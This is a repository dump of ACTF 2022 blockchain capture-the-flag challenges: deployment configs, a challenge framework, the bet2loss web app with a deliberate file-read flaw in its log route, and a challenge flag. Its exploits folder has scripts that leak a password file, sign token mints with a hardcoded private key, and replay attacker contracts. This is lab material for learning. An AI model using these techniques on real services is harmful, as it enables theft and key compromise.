| ports: 29 | - "20000:20000" 30 | links: 31 | - geth 32 | env_file: 33 | - ./eth-challenge-base/.env 34 | volumes: 35 | - ./eth-challenge-base/contracts:/home/ctf/contracts 36 | - ./eth-challenge-base/challenge.yml:/home/ctf/challenge.yml 37 | depends_on: 38 | - geth 39 | restart: always 40 | 41 | faucet: 42 | image: chainflag/eth-faucet:1.1.0 43 | container_name: ethfaucet 44 | environment: 45 | - WEB3_PROVIDER=http://geth:8545 46 | ports: 47 | - "8080:8080" 48 | links: 49 | - geth 50 | volumes: 51 | - ./config/keystore:/app/keystore 52 | - ./config/password.txt:/app/password.txt 53 | command: -wallet.keyjson /app/keystore -wallet.keypass /app/password.txt -faucet.minutes 1 54 | depends_on: 55 | - geth 56 | restart: always 57 | 58 | networks: 59 | default: 60 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | if ! [ -d "/data/geth" ]; then 4 | ./geth init "/config/genesis.json" --datadir=/data 5 | cp /config/keystore/* /data/keystore/ 6 | fi 7 | 8 | networkid=45267 9 | 10 | exec ./geth --datadir=/data \ 11 | --allow-insecure-unlock \ 12 | --networkid="$networkid" \ 13 | --nodiscover --mine \ 14 | --password="/config/password.txt" --unlock="0" \ 15 | --http --http.api=debug,eth,net,web3 --http.addr=0.0.0.0 --http.port=8545 --http.corsdomain='*' --http.vhosts='*' 16 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/.dockerignore: -------------------------------------------------------------------------------- 1 | **/__pycache__ 2 | **/*.py[cod] 3 | example/.env 4 | example/docker-compose.yml 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/.env: -------------------------------------------------------------------------------- 1 | WEB3_PROVIDER_URI=http://geth:8545 2 | 3 | ## Optional Environment Variables 4 | # TOKEN_SECRET=secret 5 | # set POW_DIFFICULTY to a non zero value to enable Proof of Work 6 | # POW_DIFFICULTY=0 -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim-buster 2 | 3 | WORKDIR /home/ctf 4 | 5 | RUN cp -a /etc/apt/sources.list /etc/apt/sources.list.bak \ 6 | && sed -i "s@http://deb.debian.org@https://repo.huaweicloud.com@g" /etc/apt/sources.list \ 7 | && sed -i "s@http://security.debian.org@https://repo.huaweicloud.com@g" /etc/apt/sources.list \ 8 | && apt-get update \ 9 | && apt-get install -y --no-install-recommends build-essential tini xinetd \ 10 | && apt-get clean \ 11 | && rm -rf /var/lib/apt/lists/* 12 | 13 | COPY requirements.txt . 14 | RUN pip install --trusted-host https://repo.huaweicloud.com -i https://repo.huaweicloud.com/repository/pypi/simple -r requirements.txt 15 | 16 | COPY run.py . 17 | COPY eth_challenge_base eth_challenge_base 18 | 19 | COPY xinetd.sh /xinetd.sh 20 | COPY entrypoint.sh /entrypoint.sh 21 | RUN mkdir /var/log/ctf 22 | RUN chmod +x /entrypoint.sh 23 | 24 | ENTRYPOINT ["tini", "-g", "--"] 25 | CMD ["/entrypoint.sh"] 26 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 ChainFlag 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/Makefile: -------------------------------------------------------------------------------- 1 | lint: 2 | black --check . --diff 3 | flake8 --ignore=E501,W503 --show-source 4 | isort --profile black . --check --diff 5 | 6 | format: 7 | black . 8 | isort --profile black . 9 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/challenge.yml: -------------------------------------------------------------------------------- 1 | contract: Game # Challenge contract name(class name) 2 | 3 | # The description will be displayed when players nc to the challenge 4 | description: | 5 | emm... this EVM looks strange! 6 | Anyway, your goal is still to make isSolved() function returns true! 7 | 8 | flag: ACTF{tH1S_i5_a_h@rd_$0rK_CaL!Ed_A@a_be20049f3607a32f660677281df6febd4e6} 9 | 10 | constructor: 11 | args: [] 12 | value: 0 13 | #gas: 1000000 # The default value is the response value of the eth_estimateGas JSON-RPC 14 | 15 | #show_source: False # Show source option available by default, you need to set False for a reverse contract challenge 16 | 17 | #solved_event: SendFlag # The default is to use isSolved() view function as solved checker, but emitted event checker is also supported 18 | 19 | #deployed_addr: 0xdac17f958d2ee523a2206206994597c13d831ec7 # Use a pre-deployed contract for all players instead of deploying individually 20 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/develop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | 4 | from run import conn_handler 5 | 6 | os.environ["TOKEN_SECRET"] = "secret" 7 | os.environ["WEB3_PROVIDER_URI"] = "http://localhost:8545" 8 | os.system("cd example && brownie compile") 9 | 10 | conn_handler("example") 11 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$TOKEN_SECRET" ]; then 4 | TOKEN_SECRET=$(openssl rand -base64 32 | tr -d /=+) 5 | export TOKEN_SECRET 6 | fi 7 | 8 | source /xinetd.sh 9 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/__init__.py: -------------------------------------------------------------------------------- 1 | __version_info__ = (0, 9, 3) 2 | __version__ = ".".join(map(str, __version_info__)) 3 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/config.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | from typing import Any 3 | 4 | import yaml 5 | 6 | 7 | @dataclass(eq=False, frozen=True) 8 | class Constructor: 9 | args: Any 10 | value: int 11 | gas_limit: int 12 | 13 | 14 | @dataclass(eq=False, frozen=True) 15 | class Config: 16 | contract: str 17 | description: str 18 | flag: str 19 | show_source: bool 20 | solved_event: str 21 | deployed_addr: str 22 | constructor: Constructor 23 | 24 | 25 | def parse_config(path: str) -> Config: 26 | with open(path, "r") as f: 27 | config = yaml.safe_load(f) 28 | 29 | show_source = config.get("show_source", True) 30 | solved_event = config.get("solved_event", "") 31 | deployed_addr = config.get("deployed_addr", "") 32 | constructor = config.get("constructor", {}) 33 | constructor_args = constructor.get("args", ()) 34 | constructor_value = constructor.get("value", 0) 35 | constructor_gas = constructor.get("gas", 0) 36 | 37 | if constructor_value is None or constructor_value < 0: 38 | constructor_value = 0 39 | 40 | return Config( 41 | config["contract"], 42 | config["description"], 43 | config["flag"], 44 | show_source, 45 | solved_event, 46 | deployed_addr, 47 | Constructor(constructor_args, constructor_value, constructor_gas), 48 | ) 49 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/utils/__init__.py: -------------------------------------------------------------------------------- 1 | from .eth import Account, Contract, web3 2 | from .pow import Powser 3 | 4 | __all__ = ["Account", "Contract", "web3", "Powser"] 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/eth_challenge_base/utils/pow.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import secrets 3 | 4 | 5 | class Powser: 6 | def __init__(self, difficulty: int, prefix_length: int = 8): 7 | self._difficulty = difficulty 8 | self._prefix = ( 9 | secrets.token_urlsafe(prefix_length)[:prefix_length] 10 | .replace("-", "b") 11 | .replace("_", "a") 12 | ) 13 | 14 | def __str__(self): 15 | return f"sha256({ self._prefix } + ???).binary.endswith('{ '0' * self._difficulty }')" 16 | 17 | def verify_hash(self, answer: str) -> bool: 18 | h = hashlib.sha256() 19 | h.update((self._prefix + answer).encode()) 20 | bits = "".join(bin(i)[2:].zfill(8) for i in h.digest()) 21 | return bits.endswith("0" * self._difficulty) 22 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements-dev.in: -------------------------------------------------------------------------------- 1 | black 2 | flake8 3 | isort 4 | pip-tools 5 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements-dev.txt: -------------------------------------------------------------------------------- 1 | # 2 | # This file is autogenerated by pip-compile with python 3.9 3 | # To update, run: 4 | # 5 | # pip-compile requirements-dev.in 6 | # 7 | black==22.1.0 8 | # via -r requirements-dev.in 9 | click==8.0.4 10 | # via 11 | # black 12 | # pip-tools 13 | flake8==4.0.1 14 | # via -r requirements-dev.in 15 | isort==5.10.1 16 | # via -r requirements-dev.in 17 | mccabe==0.6.1 18 | # via flake8 19 | mypy-extensions==0.4.3 20 | # via black 21 | pathspec==0.9.0 22 | # via black 23 | pep517==0.12.0 24 | # via pip-tools 25 | pip-tools==6.5.1 26 | # via -r requirements-dev.in 27 | platformdirs==2.5.1 28 | # via black 29 | pycodestyle==2.8.0 30 | # via flake8 31 | pyflakes==2.4.0 32 | # via flake8 33 | tomli==2.0.1 34 | # via black 35 | typing-extensions==4.1.1 36 | # via black 37 | wheel==0.37.1 38 | # via pip-tools 39 | 40 | # The following packages are considered to be unsafe in a requirements file: 41 | # pip 42 | # setuptools 43 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/requirements.in: -------------------------------------------------------------------------------- 1 | hexbytes<1 2 | pyseto>=1.6.0,<2 3 | pyyaml>=5.4.0,<6 4 | rlp<3 5 | web3>=5.27.0,<6 6 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import signal 4 | import sys 5 | 6 | from eth_challenge_base.action import Actions 7 | from eth_challenge_base.config import parse_config 8 | from eth_challenge_base.utils import Powser 9 | 10 | 11 | def conn_handler(project_path: str = "."): 12 | signal.alarm(60) 13 | difficulty = int(os.getenv("POW_DIFFICULTY", "0")) 14 | if difficulty != 0: 15 | pow_challenge = Powser(difficulty) 16 | print(f"[+] {pow_challenge}") 17 | if not pow_challenge.verify_hash(input("[-] ??? = ")): 18 | print("[+] wrong proof") 19 | sys.exit(1) 20 | 21 | project_path = os.path.join(os.path.dirname(__file__), project_path) 22 | config = parse_config(os.path.join(project_path, "challenge.yml")) 23 | print(config.description) 24 | actions = Actions(project_path, config) 25 | for i, action in enumerate(actions): 26 | print(f"[{i+1}] - {action.description}") 27 | 28 | choice = None 29 | while choice is None: 30 | try: 31 | choice = int(input("[-] input your choice: ")) - 1 32 | except ValueError: 33 | print("must be an integer") 34 | continue 35 | else: 36 | if choice < 0 or choice >= len(actions): 37 | print("invalid option") 38 | sys.exit(1) 39 | 40 | sys.exit(actions[choice].handler()) 41 | 42 | 43 | if __name__ == "__main__": 44 | conn_handler() 45 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/eth-challenge-base/xinetd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cat < /etc/xinetd.d/ctf 4 | service ctf 5 | { 6 | type = UNLISTED 7 | flags = NODELAY 8 | disable = no 9 | socket_type = stream 10 | protocol = tcp 11 | wait = no 12 | user = root 13 | log_type = FILE /var/log/ctf/xinetd.log 14 | log_on_success = PID HOST EXIT DURATION 15 | log_on_failure = HOST ATTEMPT 16 | port = ${PORT:-20000} 17 | bind = 0.0.0.0 18 | server = /usr/local/bin/python3 19 | server_args = /home/ctf/run.py 20 | per_source = ${PER_SOURCE:-4} 21 | cps = ${CPS_RATE:-200} ${CPS_DELAY:-5} 22 | rlimit_cpu = ${RLIMIT_CPU:-5} 23 | } 24 | EOF 25 | 26 | xinetd -filelog /var/log/ctf/xinetd.log 27 | tail -f /var/log/ctf/* 28 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/nginx.conf: -------------------------------------------------------------------------------- 1 | load_module modules/ngx_http_js_module.so; 2 | 3 | events { 4 | worker_connections 1024; 5 | } 6 | 7 | http { 8 | js_path "/etc/nginx/njs/"; 9 | 10 | js_import main from eth-jsonrpc-access.js; 11 | 12 | server { 13 | listen 8545; 14 | client_body_buffer_size 128k; 15 | 16 | if ($request_method !~ ^(POST)$) { 17 | return 403; 18 | } 19 | 20 | location / { 21 | js_content main.access; 22 | } 23 | 24 | location @jsonrpc { 25 | proxy_pass http://geth:8545; 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/depoly/njs/eth-jsonrpc-access.js: -------------------------------------------------------------------------------- 1 | function access(r) { 2 | var whitelist = [ 3 | "eth_blockNumber", 4 | "eth_call", 5 | "eth_chainId", 6 | "eth_estimateGas", 7 | "eth_gasPrice", 8 | "eth_getBalance", 9 | "eth_getCode", 10 | "eth_getStorageAt", 11 | "eth_getTransactionByHash", 12 | "eth_getTransactionCount", 13 | "eth_getTransactionReceipt", 14 | "eth_sendRawTransaction", 15 | "net_version", 16 | "rpc_modules", 17 | "web3_clientVersion" 18 | ]; 19 | 20 | try { 21 | var payload = JSON.parse(r.requestBody); 22 | if (payload.jsonrpc !== "2.0") { 23 | r.return(401, "jsonrpc version not supported\n"); 24 | return; 25 | } 26 | if (!whitelist.includes(payload.method)) { 27 | r.return(401, "jsonrpc method is not allowed\n"); 28 | return; 29 | } 30 | if (Object.keys(payload).filter(key => key.toLowerCase() === 'method').length > 1) { 31 | r.return(401, "jsonrpc method is not allowed\n"); 32 | return; 33 | } 34 | } catch (error) { 35 | r.return(415, "Cannot parse payload into JSON\n"); 36 | return; 37 | } 38 | 39 | r.internalRedirect('@jsonrpc'); 40 | } 41 | 42 | export default { access } 43 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/exploits/build/Game.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[],"name":"G2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"H2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"xH2","type":"uint256"},{"components":[{"internalType":"uint256[4]","name":"CG","type":"uint256[4]"},{"internalType":"uint256[4]","name":"CH","type":"uint256[4]"},{"internalType":"uint256[4]","name":"eG","type":"uint256[4]"},{"internalType":"uint256[4]","name":"eH","type":"uint256[4]"},{"internalType":"uint256[4]","name":"a0","type":"uint256[4]"},{"internalType":"uint256[4]","name":"a1","type":"uint256[4]"},{"internalType":"uint256[4]","name":"b0","type":"uint256[4]"},{"internalType":"uint256[4]","name":"b1","type":"uint256[4]"}],"internalType":"struct dleqProof","name":"proof","type":"tuple"}],"name":"check","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hint","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"newChallenge","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"xG2","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/Weird_EVM/exploits/build/Solu.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"game","outputs":[{"internalType":"contract Game","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"solve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/README.md: -------------------------------------------------------------------------------- 1 | # hints 2 | 3 | There are 3 big binaries in this directory. 4 | 5 | To ease the pressure of the repo, here are the netdisk link: 6 | 7 | https://pan.baidu.com/s/1K7D_h_pCksRYQnVmPqxGyw?pwd=ku74 8 | -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/opcodeTableGotter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir /testdata 4 | 5 | ./geth --datadir /testdata --vmdebug --nodiscover --dev --verbosity 0 & 6 | 7 | cat > /testdata/run.js <<- EOF 8 | const opcodes = []; 9 | for (let i = 0; i < 256; i++) { 10 | let log = debug.traceCall({ 11 | "to": null, 12 | "data": "0x" + (i<16?'0':'') + i.toString(16) + "000000000000000000000000000000000000000000000000000000000000000000" 13 | }, "latest", {"disableStorage": true, "disableMemory": true}); 14 | let op = log.structLogs[0].op; 15 | if (op.includes('not defined')) continue; 16 | opcodes.push([i, op]); 17 | } 18 | console.log(JSON.stringify(opcodes)); 19 | EOF 20 | 21 | ./geth --verbosity 0 js /testdata/run.js 22 | 23 | #kill -9 `ps aux | grep geth | grep testdata | awk '{print $2}' | head -n 1` 24 | 25 | rm -rf /testdata -------------------------------------------------------------------------------- /blockchain/Weird_EVM/hints/src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/Weird_EVM/hints/src.zip -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node 2 | 3 | WORKDIR /app 4 | 5 | COPY . . 6 | 7 | RUN npm --registry https://registry.npm.taobao.org install 8 | 9 | EXPOSE 3000 10 | 11 | # watch out environment variables 12 | # export IP_ADDR= 13 | # export WEB3_PROVIDER= 14 | # export DATADIR= 15 | # export WINFLAG= 16 | 17 | CMD ["bin/www"] 18 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "app", 3 | "version": "0.0.0", 4 | "private": true, 5 | "scripts": { 6 | "start": "node ./bin/www" 7 | }, 8 | "dependencies": { 9 | "cookie-parser": "~1.4.4", 10 | "debug": "~2.6.9", 11 | "ethereum-keystore": "^0.0.3", 12 | "express": "~4.16.1", 13 | "http-errors": "~1.6.3", 14 | "jade": "~1.11.0", 15 | "morgan": "~1.9.1", 16 | "solc": "^0.8.14-fixed", 17 | "web3": "^1.7.3" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/public/mdl/icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/attachments/public/public/mdl/icons.woff2 -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/public/mdl/note.txt: -------------------------------------------------------------------------------- 1 | material.indigo-blue.css与原版文件的区别 2 | 删去了.mdl-textfield--expandable .mdl-button--icon{top:16px} 3 | 在开头@charset "UTF-8";后添加@font-face{font-family:'Material Icons';font-style:normal;font-weight:400;src:url(/mdl/icons.woff2) format('woff2')} 4 | material.js与原版文件的区别 5 | 在 6 | if (registeredClass.widget) { 7 | // Assign per element instance for control over API 8 | element[registeredClass.className] = instance; 9 | } 10 | 后添加if(element.onUpgraded)element.onUpgraded(instance);(增加的事件) -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/public/stylesheets/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | padding: 50px; 3 | font: 14px "Lucida Grande", Helvetica, Arial, sans-serif; 4 | } 5 | 6 | a { 7 | color: #00B7FF; 8 | } 9 | 10 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/routes/index.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var router = express.Router(); 3 | var path = require('path'); 4 | 5 | /* GET home page. */ 6 | router.get('/', function(req, res, next) { 7 | res.sendFile(path.join(__dirname, '..', 'public', 'index.html')); // new version 8 | // res.render('index', { title: 'bet2loss', provider: "http://" + res.app.locals.providerIP + ":8545", contract: res.app.locals.game_contract }); // old version 9 | }); 10 | 11 | router.get('/config', function(req, res, next) { 12 | res.json({ title: 'bet2loss', provider: "http://" + res.app.locals.providerIP + ":8545", contract: res.app.locals.game_contract }); 13 | }); 14 | 15 | module.exports = router; 16 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/routes/log.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var router = express.Router(); 3 | let fs = require("fs"); 4 | const path = require('path'); 5 | 6 | /* GET home page. */ 7 | router.post('/', function (req, res, next) { 8 | console.log("log", req.body); 9 | 10 | // put this record into file 11 | address = req.body.address 12 | 13 | datadir = "/app/data"; 14 | adderss = "0x" + parseInt(address).toString(16) 15 | filename = address + ".txt" 16 | 17 | filepath = path.join(datadir, filename) 18 | 19 | // have to check 20 | var files = fs.readdirSync(datadir); 21 | console.log("log files:", files); 22 | 23 | if (files.indexOf(filename) !== -1) { 24 | res.download(filepath); 25 | } 26 | else { 27 | res.send("invalid address", adderss); 28 | } 29 | }); 30 | 31 | module.exports = router; 32 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/routes/sync.js: -------------------------------------------------------------------------------- 1 | var express = require('express'); 2 | var router = express.Router(); 3 | let fs = require("fs"); 4 | const path = require('path'); 5 | 6 | /* GET home page. */ 7 | router.post('/', function (req, res, next) { 8 | console.log("sync", req.body); 9 | 10 | // address check 11 | var address = req.body.address; 12 | if (!address.startsWith('0x') || isNaN(parseInt(address, 16))) { 13 | res.send("invalid address", address); 14 | return; 15 | } 16 | 17 | address = "0x" + parseInt(address, 16).toString(16) 18 | filename = address + ".txt" 19 | // put this record into file 20 | filedata = JSON.stringify(req.body) 21 | 22 | datadir = "/app/data"; 23 | filepath = path.join(datadir, filename) 24 | 25 | fs.appendFile(filepath, filedata, function (err) { 26 | if (err) { 27 | res.send("FAIL"); 28 | } 29 | res.send("OK"); 30 | }); 31 | }); 32 | 33 | module.exports = router; 34 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | /usr/local/bin/node /app/bin/www 3 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/error.jade: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | h1= message 5 | h2= error.status 6 | pre #{error.stack} 7 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/index.jade: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | h1= title 5 | div 6 | p Welcome to #{title} dApp 7 | p The Provider URL is #{provider} 8 | p Game Contract: 9 | p#gameContract #{contract} 10 | 11 | div 12 | button#connectButton 13 | 14 | div 15 | p current status: 16 | div 17 | span.label active account: 18 | p#activeAddress 19 | div 20 | span.label balance: 21 | p#remainBalance 22 | div 23 | span.label chance: 24 | p#remainChance 25 | div 26 | button#refreshBtn 27 | 28 | div 29 | button#getAirdrop 30 | 31 | div 32 | div 33 | p bet value 34 | input#inputBetVal(type="text") 35 | div 36 | p bet mod 37 | input#inputBetMod(type="text") 38 | div 39 | button#startBet 40 | 41 | div 42 | p#downloadData 43 | button#downloadContent 44 | 45 | div 46 | p#flagData 47 | button#getFlag 48 | 49 | script(src='/javascripts/index.js') -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/layout.jade: -------------------------------------------------------------------------------- 1 | doctype html 2 | html 3 | head 4 | title= title 5 | link(rel='stylesheet', href='/stylesheets/style.css') 6 | body 7 | block content 8 | -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/README.md: -------------------------------------------------------------------------------- 1 | ## solution1(intended) 2 | 3 | One bug in the code to view logs. Use it to get sealer's private key and seal token to yourself. 4 | 5 | ## soluton2(intended-after-verification) 6 | 7 | pre-calculate the answer in the constructor function and call bet is OK for win once for one address. 8 | 9 | call constructor by `CREATE2` to depoly the contract and the call `selfdestruct` to suicide for multi times is OK for win enough for one address. 10 | 11 | the BetToken in this directory is a older version, about it's abi is OK. 12 | 13 | ## solution3(unintended) 14 | 15 | tkmk found the output speed of blocks is constant, so block.timestamp is predictable. -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution1/post.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | url = 'http://123.60.36.208:30000/log' 4 | 5 | r = requests.post(url, json = {'address': 'password'}) 6 | 7 | print(r.text) 8 | -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution1/solve.py: -------------------------------------------------------------------------------- 1 | from web3 import Web3 2 | 3 | w3 = Web3(Web3.HTTPProvider('http://10.12.77.33:8545')) 4 | 5 | privkey = "143dbfce3df2e5fd33e410a138a8b175802effd56731375afa6d56c6e31ff80d" 6 | sealer = Web3.toChecksumAddress("0x20881fc6f0c9ebca911c9c07a54e60e7bd6ef4cc") 7 | contract = Web3.toChecksumAddress("0xE54709e02C58a610a29e8723b1bdeC31bfd4c6b5") 8 | gamer = Web3.toChecksumAddress("0xE530c26D50aD7c4cE8E958E7626566d3F528FAA6") 9 | 10 | def get_txn(src, dst, data, value=0): 11 | return { 12 | "chainId": 6666, 13 | "from": src, 14 | "to": dst, 15 | "gasPrice": w3.toWei(1.1, 'gwei'), 16 | "gas": 0x20000, 17 | "value": w3.toWei(value, 'wei'), 18 | "nonce": w3.eth.getTransactionCount(src), 19 | "data": data 20 | } 21 | 22 | data = "0xe7a33822" + gamer[2:].rjust(64, '0') + hex(2001)[2:].rjust(64, '0') 23 | tx = get_txn(sealer, contract, data) 24 | txn_hash = w3.eth.sendRawTransaction(w3.eth.account.signTransaction(tx, privkey).rawTransaction).hex() 25 | txn_receipt = w3.eth.waitForTransactionReceipt(txn_hash) 26 | print(txn_receipt) -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Attacker.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"doAirDrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"doNextTick","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"nonce","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pick","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"nn","type":"uint256"}],"name":"setNonce","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"state","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Callee.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"contract BetToken","name":"bt","type":"address"},{"internalType":"contract HasState","name":"state","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"die","outputs":[],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Callee.bin: -------------------------------------------------------------------------------- 1 | 608060405234801561001057600080fd5b5060405161038538038061038583398101604081905261002f91610297565b806001600160a01b031663c19d93fb6040518163ffffffff1660e01b8152600401602060405180830381865afa15801561006d573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061009191906102d1565b6000036100f057816001600160a01b0316633884d6356040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156100d357600080fd5b505af11580156100e7573d6000803e3d6000fd5b50505050610278565b806001600160a01b031663c19d93fb6040518163ffffffff1660e01b8152600401602060405180830381865afa15801561012e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061015291906102d1565b600103610278576000600c826001600160a01b031663affed0e06040518163ffffffff1660e01b8152600401602060405180830381865afa15801561019b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906101bf91906102d1565b60408051602081019290925242908201524460608083019190915230901b6001600160601b03191660808201526094016040516020818303038152906040528051906020012060001c61021291906102ea565b604051636ffcc71960e01b815260048101829052600c60248201529091506001600160a01b03841690636ffcc71990604401600060405180830381600087803b15801561025e57600080fd5b505af1158015610272573d6000803e3d6000fd5b50505050505b505061030c565b6001600160a01b038116811461029457600080fd5b50565b600080604083850312156102aa57600080fd5b82516102b58161027f565b60208401519092506102c68161027f565b809150509250929050565b6000602082840312156102e357600080fd5b5051919050565b60008261030757634e487b7160e01b600052601260045260246000fd5b500690565b606b8061031a6000396000f3fe6080604052348015600f57600080fd5b506004361060285760003560e01c806335f4699414602d575b600080fd5b60336000ff5b00fea2646970667358221220bde5421236a79993e62dccea676f2030e77aad4e9a37b60927ffb9165298b6be64736f6c634300080f0033 -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Context.abi: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- 